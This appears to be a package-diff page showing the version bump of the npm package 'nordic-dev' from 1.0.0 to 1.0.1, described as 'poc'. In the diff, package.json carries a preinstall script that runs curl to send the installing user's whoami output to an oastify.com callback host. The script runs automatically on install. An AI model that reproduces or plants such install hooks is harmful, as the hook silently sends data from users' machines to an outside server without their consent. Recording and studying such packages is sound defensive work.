nordic-dev 1.0.0 → 1.0.1
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +2 -2
package/package.json
CHANGED
@@ -1,11 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "nordic-dev",
|
3
|
-
"version": "1.0.
|
3
|
+
"version": "1.0.1",
|
4
4
|
"description": "poc",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
7
|
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
-
"preinstall": "curl --data-urlencode info=$(
|
8
|
+
"preinstall": "curl --data-urlencode info=$(whoami) http://479pa367cl3elrpuciye4inib9h65wtl.oastify.com"
|
9
9
|
},
|
10
10
|
"author": "Akita",
|
11
11
|
"license": "ISC",
|